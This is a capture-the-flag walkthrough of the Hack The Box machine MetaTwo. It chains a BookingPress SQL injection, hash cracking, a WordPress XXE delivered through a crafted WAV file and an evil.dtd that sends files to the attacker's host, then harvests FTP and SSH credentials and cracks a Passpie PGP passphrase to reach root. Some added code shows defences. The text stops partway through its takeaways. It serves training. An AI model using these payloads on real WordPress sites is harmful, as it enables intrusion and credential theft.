███╗ ███╗███████╗████████╗ █████╗ ████████╗██╗ ██╗ ██████╗
████╗ ████║██╔════╝╚══██╔══╝██╔══██╗╚══██╔══╝██║ ██║██╔═══██╗
██╔████╔██║█████╗ ██║ ███████║ ██║ ██║ █╗ ██║██║ ██║
██║╚██╔╝██║██╔══╝ ██║ ██╔══██║ ██║ ██║███╗██║██║ ██║
██║ ╚═╝ ██║███████╗ ██║ ██║ ██║ ██║ ╚███╔███╔╝╚██████╔╝
╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚══╝╚══╝ ╚═════╝
┌──────────────────────────────────────────────────────────────────────────────┐
│░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░│
│░ ██████╗ ███████╗███╗ ██╗███████╗████████╗██████╗ █████╗ ████████╗██╗ ██████╗ ███╗ ██╗ ░│
│░ ██╔══██╗██╔════╝████╗ ██║██╔════╝╚══██╔══╝██╔══██╗██╔══██╗╚══██╔══╝██║██╔═══██╗████╗ ██║ ░│
│░ ██████╔╝█████╗ ██╔██╗ ██║█████╗ ██║ ██████╔╝███████║ ██║ ██║██║ ██║██╔██╗ ██║ ░│
│░ ██╔═══╝ ██╔══╝ ██║╚██╗██║██╔══╝ ██║ ██╔══██╗██╔══██║ ██║ ██║██║ ██║██║╚██╗██║ ░│
│░ ██║ ███████╗██║ ╚████║███████╗ ██║ ██║ ██║██║ ██║ ██║ ██║╚██████╔╝██║ ╚████║ ░│
│░ ╚═╝ ╚══════╝╚═╝ ╚═══╝╚══════╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝ ░│
│░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░│
│ W O R D P R E S S // E X P L O I T A T I O N │
└──────────────────────────────────────────────────────────────────────────────┘
╔══════════════════════════════════════════════════════════════════════════════════╗
║ ATTACK VECTORS ║
╠══════════════════════════════════════════════════════════════════════════════════╣
║ [+] WordPress Enumeration & Vulnerability Scanning ║
║ [+] BookingPress SQL Injection (CVE-2022-0739) ║
║ [+] WordPress Hash Cracking with Hashcat ║
║ [+] XML External Entity Injection (CVE-2021-29447) ║
║ [+] File Disclosure via Crafted WAV Upload ║
║ [+] FTP Enumeration & Credential Harvesting ║
║ [+] PGP Private Key Cracking with John the Ripper ║
║ [+] Passpie Password Manager Exploitation ║
╚══════════════════════════════════════════════════════════════════════════════════╝
- >_ TARGET ACQUISITION
- >_ INITIAL RECONNAISSANCE
- >_ WEB ENUMERATION
- >_ FOOTHOLD // SQL INJECTION
- >_ XXE FILE DISCLOSURE
- >_ FTP ENUMERATION
- >_ INITIAL ACCESS
- >_ PRIVILEGE ESCALATION
- >_ SYSTEM ACCESS OBTAINED
- >_ CREDENTIALS VAULT
- >_ MITRE ATT&CK MAPPING
┌─────────────────────────────────────────────────────────────────────────────────┐
│ T A R G E T I N F I L T R A T I O N P A R A M E T E R S │
├─────────────────────────────────────────────────────────────────────────────────┤
│ IP ADDRESS........: 10.10.11.186 │
│ HOSTNAME..........: metapress.htb │
│ DOMAIN............: metapress.htb │
│ OPERATING SYSTEM..: Debian 11 (Linux 5.10.0-19-amd64) │
│ DIFFICULTY........: Easy │
│ ATTACK SURFACE....: WordPress Web Application │
│ KEY SERVICES......: FTP, SSH, HTTP (nginx) │
└─────────────────────────────────────────────────────────────────────────────────┘
Add target to /etc/hosts:
echo "10.10.11.186 metapress.htb" | sudo tee -a /etc/hosts
Comprehensive port scan:
rustscan -a $RHOST --ulimit 5000 -r 1-65535 -- -A -oA HTB-MetaTwo-Scan
Scan Results:
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD Server (Debian)
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1
80/tcp open http nginx 1.18.0
Critical Ports Identified:
| Port | Service | Significance |
|---|---|---|
| 21 | FTP | ProFTPD (Debian) - Requires credentials |
| 22 | SSH | OpenSSH 8.4p1 Debian - Standard SSH service |
| 80 | HTTP | nginx 1.18.0 - Redirects to metapress.htb |
┌──────────────────────────────────────────────────────────────────────┐
│ KEY FINDINGS │
├──────────────────────────────────────────────────────────────────────┤
│ [+] HTTP redirects to metapress.htb - WordPress site │
│ [+] FTP service available - credentials needed │
│ [+] Debian 11 system with standard services │
└──────────────────────────────────────────────────────────────────────┘
Key findings from Wappalyzer:
- WordPress 5.6.2
- PHP 8.0.24
- nginx 1.18.0
╔══════════════════════════════════════════════════════════════════════════════════╗
║ WORDPRESS VERSION IDENTIFIED ║
╠══════════════════════════════════════════════════════════════════════════════════╣
║ VERSION: 5.6.2 (Released 2021-02-22) ║
║ STATUS: Insecure - Multiple known vulnerabilities ║
╚══════════════════════════════════════════════════════════════════════════════════╝
With WordPress 5.6.2 identified, the WPScan vulnerability database was checked for that version:
WPScan Database Search Results:
wpscan --url http://metapress.htb/ --api-token $API -e
╔══════════════════════════════════════════════════════════════════════════════════╗
║ CRITICAL VULNERABILITIES IDENTIFIED ║
╠══════════════════════════════════════════════════════════════════════════════════╣
║ WordPress Version: 5.6.2 (Insecure, released 2021-02-22) ║
║ ║
║ CVE-2021-29447 - XXE in Media Library (PHP 8) ║
║ - WPScan: https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5 ║
║ - Authenticated XXE affecting PHP 8 ║
║ - Can read arbitrary files via crafted WAV file upload ║
║ ║
║ CVE-2022-0739 - BookingPress SQL Injection ║
║ - Unauthenticated SQLi in BookingPress < 1.0.11 ║
║ - Can extract database credentials and hashes ║
╚══════════════════════════════════════════════════════════════════════════════════╝
Figure 3: Events page with BookingPress plugin vulnerable to SQLi
╔══════════════════════════════════════════════════════════════════════════════════╗
║ VULNERABILITY IDENTIFIED ║
╠══════════════════════════════════════════════════════════════════════════════════╣
║ TYPE......: BookingPress Unauthenticated SQL Injection ║
║ CVE.......: CVE-2022-0739 ║
║ SEVERITY..: CRITICAL ║
║ IMPACT....: Database enumeration, credential extraction ║
╚══════════════════════════════════════════════════════════════════════════════════╝
First, obtain the nonce value from the page source:
curl -s http://metapress.htb/ | grep "wpnonce"
Test the SQL injection manually:
curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' \
--data 'action=bookingpress_front_get_category_services&_wpnonce=6cf26b4ef7&category_id=33&total_service=-7502) UNION ALL SELECT @@version,@@version_comment,@@version_compile_os,1,2,3,4,5,6-- -'
Response confirms the vulnerability:
[{"bookingpress_service_id":"10.5.15-MariaDB-0+deb11u1","bookingpress_category_id":"Debian 11","bookingpress_service_name":"debian-linux-gnu"...}]
Enumerate databases:
sqlmap -u "http://metapress.htb/wp-admin/admin-ajax.php" \
--data="action=bookingpress_front_get_category_services&_wpnonce=6cf26b4ef7&category_id=33&total_service=1" \
-p total_service \
--batch \
--dbs \
--level=5 \
--risk=3
Databases found: blog, information_schema
Dump wp_users table:
sqlmap -u "http://metapress.htb/wp-admin/admin-ajax.php" \
--data="action=bookingpress_front_get_category_services&_wpnonce=6cf26b4ef7&category_id=33&total_service=1" \
-p total_service \
--level=5 \
--risk=3 \
-D blog \
-T wp_users \
--dump
WordPress users extracted:
admin:$P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.
manager:$P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70
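The BookingPress bug exploited above is the textbook pattern of a request parameter concatenated into SQL. The following is an added example, not the plugin's code and not part of the original writeup: it models the vulnerable pattern and its fix in Python against an in-memory SQLite database. The query shape, table contents and sample hash are constructed for illustration (the plugin's real SQL is not on the page), and the injected value mirrors the shape of the page's `total_service` payload so that the contrast with the integer-validated, parameterized version is visible.

```python
import sqlite3
from typing import List, Tuple

# Constructed sample: a services table in the shape a booking plugin might use, plus the
# WordPress users table that an injected UNION would reach for.
def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE bp_services (service_id INTEGER, category_id INTEGER, service_name TEXT);
        CREATE TABLE wp_users (user_login TEXT, user_pass TEXT);
        INSERT INTO bp_services VALUES (1, 33, 'Consultation'), (2, 33, 'Follow-up'), (3, 34, 'Other');
        INSERT INTO wp_users VALUES ('admin', '$P$B.constructed.sample.hash');
    """)
    return con

# Hypothetical query shape (not the plugin's real SQL): the AJAX parameters are interpolated
# straight into the statement, so a value that closes the parenthesis can append a UNION.
def get_category_services_vulnerable(con, category_id: str, total_service: str) -> List[Tuple]:
    sql = ("SELECT service_id, category_id, service_name FROM bp_services "
           f"WHERE (category_id = {category_id} AND service_id <= {total_service})")
    return con.execute(sql).fetchall()

# Hardened form: coerce both parameters to integers (what PHP's absint()/intval() does) and
# bind them as query parameters so the SQL text never changes with user input.
def get_category_services_safe(con, category_id: str, total_service: str) -> List[Tuple]:
    try:
        cat, total = int(category_id), int(total_service)
    except (TypeError, ValueError) as exc:
        raise ValueError("category_id and total_service must be integers") from exc
    sql = ("SELECT service_id, category_id, service_name FROM bp_services "
           "WHERE (category_id = ? AND service_id <= ?)")
    return con.execute(sql, (cat, total)).fetchall()

# Constructed input in the same shape as the page's total_service payload: a closing
# parenthesis, a UNION with a matching column count, and a trailing comment.
INJECTED = "-7502) UNION ALL SELECT user_login, user_pass, 'x' FROM wp_users-- -"

def demo() -> dict:
    """Run both versions on a legitimate request and on the injected one."""
    con = make_db()
    try:
        get_category_services_safe(con, "33", INJECTED)
        hardened_rejected = False
    except ValueError:
        hardened_rejected = True
    return {
        "legit_vulnerable": get_category_services_vulnerable(con, "33", "2"),
        "injected_vulnerable": get_category_services_vulnerable(con, "33", INJECTED),
        "legit_safe": get_category_services_safe(con, "33", "2"),
        "hardened_rejected": hardened_rejected,
    }

if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The vulnerable path returns the `wp_users` row in place of service data, which is exactly what the sqlmap dump above relied on; the hardened path refuses the value before any SQL is built, and even a non-numeric value that slipped through would be sent as a bound parameter rather than as SQL text.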
Figure 7: Hash identification showing WordPress phpass format (mode 400)
hashcat -m 400 wpUsers.hash --wordlist wordlists/rockyou.txt --username
╔══════════════════════════════════════════════════════════════════════════════════╗
║ PASSWORD CRACKED ║
╠══════════════════════════════════════════════════════════════════════════════════╣
║ USERNAME: manager ║
║ PASSWORD: partylikearockstar ║
╚══════════════════════════════════════════════════════════════════════════════════╝
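Hashcat mode 400 is phpass, the portable hash format behind the `$P$`-prefixed values dumped above. The added Python example below is not from the writeup; it implements the phpass verification algorithm so the format can be read: the character after `$P$` encodes log2 of the MD5 iteration count (`B` is 2^13 = 8192), followed by an 8-character salt and a 22-character digest in phpass's own base64 alphabet. The demo password and salt are constructed; only the prefix of the page's hashes is used, to decode their iteration count.

```python
import hashlib
import hmac

# phpass's custom base64 alphabet (not the RFC 4648 one)
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

def _encode64(data: bytes, count: int) -> str:
    """phpass encode64: packs 3 bytes into 4 characters, low bits first."""
    out = []
    i = 0
    while i < count:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)

def iteration_count(setting: str) -> int:
    """Decode the MD5 iteration count from character 4 of a $P$/$H$ hash ('B' -> 2**13)."""
    if setting[:3] not in ("$P$", "$H$"):
        raise ValueError("not a phpass portable hash")
    log2 = ITOA64.find(setting[3])
    if log2 < 7 or log2 > 30:
        raise ValueError("iteration count out of range")
    return 1 << log2

def phpass_hash(password: bytes, setting: str) -> str:
    """Compute a portable phpass hash for `password` under a 12-character setting string."""
    count = iteration_count(setting)
    salt = setting[4:12].encode("ascii")
    if len(salt) != 8:
        raise ValueError("salt must be 8 characters")
    digest = hashlib.md5(salt + password).digest()
    for _ in range(count):
        digest = hashlib.md5(digest + password).digest()
    return setting[:12] + _encode64(digest, 16)

def verify(password: bytes, stored: str) -> bool:
    """Constant-time check of a candidate password against a stored phpass hash."""
    if len(stored) != 34:
        return False
    return hmac.compare_digest(phpass_hash(password, stored[:12]), stored)

if __name__ == "__main__":
    # Constructed demo salt; not a hash from the page.
    demo = phpass_hash(b"constructed-demo", "$P$Bsaltsalt")
    print(demo, verify(b"constructed-demo", demo), iteration_count(demo))
```

The cost is 8192 iterations of MD5 per guess, which is why a wordlist run finishes in seconds on commodity hardware; the defensive counterpart is migrating stored hashes to bcrypt or Argon2 (PHP's `password_hash()`) and enforcing a minimum password length for every account with upload or publishing rights.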
After obtaining the manager credentials via SQLi, the next attack vector was CVE-2021-29447, found through the WPScan vulnerability database lookup for WordPress 5.6.2.
WPScan Vulnerability Details:
- CVE-2021-29447 - WordPress XXE via Media Library
- Affects WordPress 5.6.0 to 5.7.0 (with PHP 8)
- Requires authenticated access (which we now have via manager account)
- Exploited via malicious WAV file upload to Media Library
╔══════════════════════════════════════════════════════════════════════════════════╗
║ VULNERABILITY IDENTIFIED ║
╠══════════════════════════════════════════════════════════════════════════════════╣
║ TYPE......: WordPress XXE in Media Library ║
║ CVE.......: CVE-2021-29447 ║
║ WPSCAN ID.: cbbe6c17-b24e-4be4-8937-c78472a138b5 ║
║ SEVERITY..: CRITICAL (CVSS 9.8) ║
║ IMPACT....: Arbitrary file read, credential disclosure ║
║ REQUIRES..: Authenticated access (Contributor+ role) ║
╚══════════════════════════════════════════════════════════════════════════════════╝
Attack Prerequisites:
- ✅ WordPress version 5.6.2 (vulnerable)
- ✅ PHP 8.0.24 (required for XXE parsing)
- ✅ Authenticated user with upload permissions (manager account)
- ✅ Media Library access
Create evil.dtd file:
cat > evil.dtd << 'EOF'
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://10.10.16.16:8080/?p=%file;'>" >
EOF
Create payload.wav with a proper WAV structure:
python3 << 'EOF'
import struct

# XXE payload: loads the remote DTD, then expands the parameter entities it defines
xxe_payload = b"""<?xml version='1.0'?>
<!DOCTYPE ANY[
<!ENTITY % remote SYSTEM 'http://10.10.16.16:8080/evil.dtd'>
%remote;%init;%trick;
]>"""

# Build a proper WAV structure: RIFF header, a valid PCM fmt chunk, then the XXE in an iXML chunk
riff = b'RIFF'
wave = b'WAVE'
fmt_chunk = b'fmt ' + struct.pack('<I', 16) + struct.pack('<HHIIHH', 1, 2, 44100, 176400, 4, 16)

# Embed the XXE in an iXML chunk (chunk id, little-endian size, data)
ixml = b'iXML' + struct.pack('<I', len(xxe_payload)) + xxe_payload

# RIFF chunks are word-aligned: an odd-length chunk gets one pad byte that is not counted in its size
if len(xxe_payload) % 2:
    ixml += b'\x00'

# RIFF size = the 'WAVE' tag (4 bytes) plus every chunk that follows
total_size = 4 + len(fmt_chunk) + len(ixml)
header = riff + struct.pack('<I', total_size) + wave

with open('payload.wav', 'wb') as f:
    f.write(header + fmt_chunk + ixml)
EOF
Start an HTTP server to receive the callbacks:
python3 -m http.server 8080
Figure 8: WordPress Media Upload interface for XXE exploitation
Upload payload.wav to the WordPress Media Library as the manager user. The HTTP server receives the base64-encoded file content.
Decode the received data:
echo "cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2Jpbjov..." | base64 -d
User discovered:
jnelson:x:1000:1000:jnelson,,,:/home/jnelson:/bin/bash
Update evil.dtd to target WordPress configuration:
cat > evil.dtd << 'EOF'
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=../wp-config.php">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://10.10.16.16:8080/?p=%file;'>" >
EOF
Upload payload.wav again and decode the response:
echo "PD9waHANCi8qKiBUaGUgbmFtZSBvZiB0aGUgZGF0YWJhc2UgZm9yIFdvcmRQcmVzcyAqLw0KZGVmaW5l..." | base64 -d
╔══════════════════════════════════════════════════════════════════════════════════╗
║ FTP CREDENTIALS DISCOVERED ║
╠══════════════════════════════════════════════════════════════════════════════════╣
║ define( 'DB_PASSWORD', '635Aq@TdqrCwXFUZ' ); ║
║ define( 'FTP_USER', 'metapress.htb' ); ║
║ define( 'FTP_PASS', '9NYS_ii@FyL_p5M2NvJ' ); ║
║ define( 'FTP_HOST', 'ftp.metapress.htb' ); ║
╚══════════════════════════════════════════════════════════════════════════════════╝
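CVE-2021-29447 works because the iXML chunk of an uploaded WAV file is handed to an XML parser by WordPress's media metadata handling, so the audio container is only a wrapper around a DTD. An upload pipeline can reject such files before they reach any XML parser. The following is an added Python example, not from the writeup: it walks the RIFF chunk list (honouring the pad byte after odd-length chunks, the same detail the payload generator above has to get right), flags any chunk whose text carries a DOCTYPE or ENTITY declaration, and refuses files whose chunk sizes overrun the data. Both WAV samples are constructed inline, and `attacker.invalid` is a placeholder host.

```python
import struct
from typing import Iterator, List, Tuple

# Declarations that have no business inside audio metadata: a DTD with entity definitions.
XXE_MARKERS = (b"<!doctype", b"<!entity")

def iter_riff_chunks(blob: bytes) -> Iterator[Tuple[bytes, bytes]]:
    """Yield (chunk_id, payload) for each chunk of a RIFF/WAVE container.

    Raises ValueError for a bad header or a chunk whose declared size overruns the file."""
    if len(blob) < 12 or blob[:4] != b"RIFF" or blob[8:12] != b"WAVE":
        raise ValueError("not a RIFF/WAVE file")
    riff_size = struct.unpack("<I", blob[4:8])[0]
    end = min(len(blob), 8 + riff_size)
    pos = 12
    while pos + 8 <= end:
        chunk_id = blob[pos:pos + 4]
        size = struct.unpack("<I", blob[pos + 4:pos + 8])[0]
        data_start, data_end = pos + 8, pos + 8 + size
        if data_end > end:
            raise ValueError(f"chunk {chunk_id!r} declares {size} bytes but the file ends first")
        yield chunk_id, blob[data_start:data_end]
        # Chunks are word-aligned: an odd size is followed by one pad byte not counted in `size`.
        pos = data_end + (size & 1)

def scan_wav_for_xxe(blob: bytes) -> List[Tuple[bytes, bytes]]:
    """Return (chunk_id, marker) for every chunk carrying a DOCTYPE or ENTITY declaration."""
    findings = []
    for chunk_id, payload in iter_riff_chunks(blob):
        lowered = payload.lower()
        for marker in XXE_MARKERS:
            if marker in lowered:
                findings.append((chunk_id, marker))
                break
    return findings

def is_structurally_valid(blob: bytes) -> bool:
    """True when every chunk can be walked to the end of the declared RIFF size."""
    try:
        for _ in iter_riff_chunks(blob):
            pass
        return True
    except ValueError:
        return False

def build_wav(extra_chunks: List[Tuple[bytes, bytes]]) -> bytes:
    """Build a minimal 8 kHz mono PCM WAV (constructed sample) followed by the given chunks."""
    def chunk(chunk_id: bytes, payload: bytes) -> bytes:
        pad = b"\x00" if len(payload) & 1 else b""
        return chunk_id + struct.pack("<I", len(payload)) + payload + pad
    fmt = chunk(b"fmt ", struct.pack("<HHIIHH", 1, 1, 8000, 16000, 2, 16))
    data = chunk(b"data", b"\x00\x00" * 8)
    body = fmt + data + b"".join(chunk(c, p) for c, p in extra_chunks)
    return b"RIFF" + struct.pack("<I", 4 + len(body)) + b"WAVE" + body

# Constructed samples. The odd-length 'note' chunk forces the pad-byte path before iXML is reached.
BENIGN_WAV = build_wav([
    (b"note", b"odd"),
    (b"iXML", b"<?xml version='1.0'?><BWFXML><PROJECT>demo</PROJECT></BWFXML>"),
])
SUSPECT_WAV = build_wav([
    (b"note", b"odd"),
    (b"iXML", b"<?xml version='1.0'?><!DOCTYPE x [<!ENTITY % ext SYSTEM "
              b"'http://attacker.invalid/x.dtd'> %ext;]><BWFXML/>"),  # placeholder host
])

if __name__ == "__main__":
    print("benign :", scan_wav_for_xxe(BENIGN_WAV))
    print("suspect:", scan_wav_for_xxe(SUSPECT_WAV))
```

A check like this belongs in front of the media library, not instead of patching: the durable fix is the WordPress update named in the remediation section, with upload rights limited to the roles that need them, and the scanner is a compensating control for the window before that update lands.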
ftp 10.10.11.186
Name: metapress.htb
Password: 9NYS_ii@FyL_p5M2NvJ
FTP directory structure:
drwxr-xr-x 5 metapress.htb metapress.htb 4096 Oct 5 2022 blog
drwxr-xr-x 3 metapress.htb metapress.htb 4096 Oct 5 2022 mailer
Navigate to mailer directory:
ftp> cd mailer
ftp> ls
drwxr-xr-x 4 metapress.htb metapress.htb 4096 Oct 5 2022 PHPMailer
-rw-r--r-- 1 metapress.htb metapress.htb 1126 Jun 22 2022 send_email.php
Download and analyze send_email.php:
ftp> get send_email.php
File contents reveal SSH credentials:
<?php
use PHPMailer\PHPMailer\PHPMailer;
// ...
$mail->Host = "mail.metapress.htb";
$mail->SMTPAuth = true;
$mail->Username = "jnelson@metapress.htb";
$mail->Password = "Cb4_JmWM8zUZWMu@Ys";
$mail->SMTPSecure = "tls";
$mail->Port = 587;
╔══════════════════════════════════════════════════════════════════════════════════╗
║ SSH CREDENTIALS DISCOVERED ║
╠══════════════════════════════════════════════════════════════════════════════════╣
║ USERNAME: jnelson ║
║ PASSWORD: Cb4_JmWM8zUZWMu@Ys ║
╚══════════════════════════════════════════════════════════════════════════════════╝
ssh jnelson@metapress.htb
jnelson@meta2:~$ ls
user.txt
jnelson@meta2:~$ cat user.txt
ab881{SNIP}
jnelson@meta2:~$ ls -lah
total 32K
drwxr-xr-x 4 jnelson jnelson 4.0K Oct 25 2022 .
drwxr-xr-x 3 root root 4.0K Oct 5 2022 ..
lrwxrwxrwx 1 root root 9 Jun 26 2022 .bash_history -> /dev/null
-rw-r--r-- 1 jnelson jnelson 220 Jun 26 2022 .bash_logout
-rw-r--r-- 1 jnelson jnelson 3.5K Jun 26 2022 .bashrc
drwxr-xr-x 3 jnelson jnelson 4.0K Oct 25 2022 .local
dr-xr-x--- 3 jnelson jnelson 4.0K Oct 25 2022 .passpie
-rw-r--r-- 1 jnelson jnelson 807 Jun 26 2022 .profile
-rw-r----- 1 root jnelson 33 Jan 14 21:04 user.txt
╔══════════════════════════════════════════════════════════════════════════════════╗
║ PRIVILEGE ESCALATION VECTOR IDENTIFIED ║
╠══════════════════════════════════════════════════════════════════════════════════╣
║ TYPE......: Weak PGP Passphrase in Passpie Password Manager ║
║ SEVERITY..: CRITICAL ║
║ IMPACT....: Passpie stores encrypted passwords protected by PGP key ║
║ Cracking the passphrase reveals all stored credentials ║
╚══════════════════════════════════════════════════════════════════════════════════╝
jnelson@meta2:~$ cd .passpie
jnelson@meta2:~/.passpie$ ls -al
total 24
dr-xr-x--- 3 jnelson jnelson 4096 Oct 25 2022 .
drwxr-xr-x 4 jnelson jnelson 4096 Oct 25 2022 ..
-r-xr-x--- 1 jnelson jnelson 3 Jun 26 2022 .config
-r-xr-x--- 1 jnelson jnelson 5243 Jun 26 2022 .keys
dr-xr-x--- 2 jnelson jnelson 4096 Oct 25 2022 ssh
Copy the .keys file to the attacker machine:
scp jnelson@10.10.11.186:/home/jnelson/.passpie/.keys ./keys
Convert the PGP private key to John format:
gpg2john keys > priv-key.hash
Crack with John the Ripper:
john priv-key.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 65011712 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort
blink182 (Passpie)
1g 0:00:00:01 DONE (2026-01-14 23:02)
╔══════════════════════════════════════════════════════════════════════════════════╗
║ PGP PASSPHRASE CRACKED ║
╠══════════════════════════════════════════════════════════════════════════════════╣
║ PASSPHRASE: blink182 ║
╚══════════════════════════════════════════════════════════════════════════════════╝
jnelson@meta2:~/.passpie$ passpie export ~/password.db
Passphrase: blink182
jnelson@meta2:~$ cat ~/password.db
credentials:
- comment: ''
fullname: root@ssh
login: root
modified: 2022-06-26 08:58:15.621572
name: ssh
password: !!python/unicode 'p7qfAZt4_A1xo_0x'
- comment: ''
fullname: jnelson@ssh
login: jnelson
modified: 2022-06-26 08:58:15.514422
name: ssh
password: !!python/unicode 'Cb4_JmWM8zUZWMu@Ys'
handler: passpie
version: 1.0
╔══════════════════════════════════════════════════════════════════════════════════╗
║ ROOT PASSWORD OBTAINED ║
╠══════════════════════════════════════════════════════════════════════════════════╣
║ USERNAME: root ║
║ PASSWORD: p7qfAZt4_A1xo_0x ║
╚══════════════════════════════════════════════════════════════════════════════════╝
jnelson@meta2:~$ su root
Password: p7qfAZt4_A1xo_0x
root@meta2:~# id
uid=0(root) gid=0(root) groups=0(root)
root@meta2:~# cat root.txt
76609{SNIP}
╔═══════════════════════════════════════════════════════════════════════════════════╗
║ ║
║ ███████╗██╗ ██╗███████╗████████╗███████╗███╗ ███╗ ║
║ ██╔════╝╚██╗ ██╔╝██╔════╝╚══██╔══╝██╔════╝████╗ ████║ ║
║ ███████╗ ╚████╔╝ ███████╗ ██║ █████╗ ██╔████╔██║ ║
║ ╚════██║ ╚██╔╝ ╚════██║ ██║ ██╔══╝ ██║╚██╔╝██║ ║
║ ███████║ ██║ ███████║ ██║ ███████╗██║ ╚═╝ ██║ ║
║ ╚══════╝ ╚═╝ ╚══════╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ ║
║ ║
║ root@meta2:~# whoami ║
║ root ║
║ ║
╚═══════════════════════════════════════════════════════════════════════════════════╝
╔═══════════════════════════════════════════════════════════════════════════════════╗
║ ║
║ ██╗ ██╗███████╗███████╗██████╗ ███████╗██╗ █████╗ ██████╗ ║
║ ██║ ██║██╔════╝██╔════╝██╔══██╗ ██╔════╝██║ ██╔══██╗██╔════╝ ║
║ ██║ ██║███████╗█████╗ ██████╔╝ █████╗ ██║ ███████║██║ ███╗ ║
║ ██║ ██║╚════██║██╔══╝ ██╔══██╗ ██╔══╝ ██║ ██╔══██║██║ ██║ ║
║ ╚██████╔╝███████║███████╗██║ ██║ ██║ ███████╗██║ ██║╚██████╔╝ ║
║ ╚═════╝ ╚══════╝╚══════╝╚═╝ ╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ ╚═════╝ ║
║ ║
║ LOCATION: /home/jnelson/user.txt ║
║ FLAG: ab881{SNIP} ║
║ ║
╚═══════════════════════════════════════════════════════════════════════════════════╝
╔═══════════════════════════════════════════════════════════════════════════════════╗
║ ║
║ ██████╗ ██████╗ ██████╗ ████████╗ ███████╗██╗ █████╗ ██████╗ ║
║ ██╔══██╗██╔═══██╗██╔═══██╗╚══██╔══╝ ██╔════╝██║ ██╔══██╗██╔════╝ ║
║ ██████╔╝██║ ██║██║ ██║ ██║ █████╗ ██║ ███████║██║ ███╗ ║
║ ██╔══██╗██║ ██║██║ ██║ ██║ ██╔══╝ ██║ ██╔══██║██║ ██║ ║
║ ██║ ██║╚██████╔╝╚██████╔╝ ██║ ██║ ███████╗██║ ██║╚██████╔╝ ║
║ ╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ ╚═════╝ ║
║ ║
║ LOCATION: /root/root.txt ║
║ FLAG: 76609{SNIP} ║
║ ║
╚═══════════════════════════════════════════════════════════════════════════════════╝
╔════════════════════════════════════════════════════════════════════════════════════════════════════════════╗
║ EXFILTRATED CREDENTIALS ║
╠════════════╦══════════════════╦════════════════════════════════════════════╦═══════════════════════════════╣
║ TYPE ║ USERNAME ║ PASSWORD / HASH ║ SOURCE ║
╠════════════╬══════════════════╬════════════════════════════════════════════╬═══════════════════════════════╣
║ WP Hash ║ admin ║ $P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV. ║ SQL Injection ║
║ WP Hash ║ manager ║ $P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70 ║ SQL Injection ║
║ Cleartext ║ manager ║ partylikearockstar ║ Hashcat Crack ║
║ DB Creds ║ blog ║ 635Aq@TdqrCwXFUZ ║ wp-config.php (XXE) ║
║ FTP ║ metapress.htb ║ 9NYS_ii@FyL_p5M2NvJ ║ wp-config.php (XXE) ║
║ SSH ║ jnelson ║ Cb4_JmWM8zUZWMu@Ys ║ send_email.php (FTP) ║
║ PGP Pass ║ Passpie ║ blink182 ║ John the Ripper ║
║ SSH ║ root ║ p7qfAZt4_A1xo_0x ║ Passpie Export ║
╚════════════╩══════════════════╩════════════════════════════════════════════╩═══════════════════════════════╝
| Tactic | Technique ID | Technique Name | Implementation |
|---|---|---|---|
| Reconnaissance | T1595.002 | Active Scanning | Rustscan/Nmap port enumeration |
| Initial Access | T1190 | Exploit Public Application | WordPress SQLi + XXE |
| Credential Access | T1110.002 | Password Cracking | Hashcat (WordPress), John (PGP) |
| Credential Access | T1552.001 | Credentials in Files | wp-config.php, send_email.php |
| Discovery | T1083 | File and Directory Discovery | FTP enumeration |
| Collection | T1005 | Data from Local System | XXE file disclosure |
| Privilege Escalation | T1552.004 | Private Keys | PGP key cracking |
| Tool | Purpose |
|---|---|
| rustscan | Fast port scanning |
| nmap | Service enumeration |
| wpscan | WordPress vulnerability scanning |
| sqlmap | SQL injection exploitation |
| hashcat | WordPress hash cracking (mode 400) |
| curl | Manual XXE exploitation |
| python3 | WAV payload generation |
| ftp | File transfer protocol client |
| john | PGP passphrase cracking |
| passpie | Password manager exploitation |
┌──────────────────────────────────────────────────────────────────────────────────┐
│ KEY TAKEAWAYS │
├──────────────────────────────────────────────────────────────────────────────────┤
│ │
│ [1] WordPress Plugin Vulnerabilities │
│ - Always keep WordPress and plugins updated │
│ - BookingPress < 1.0.11 has critical unauthenticated SQLi │
│ │
│ [2] XXE Exploitation Complexity │
│ - Proper WAV file structure required for PHP 8 XXE exploitation │
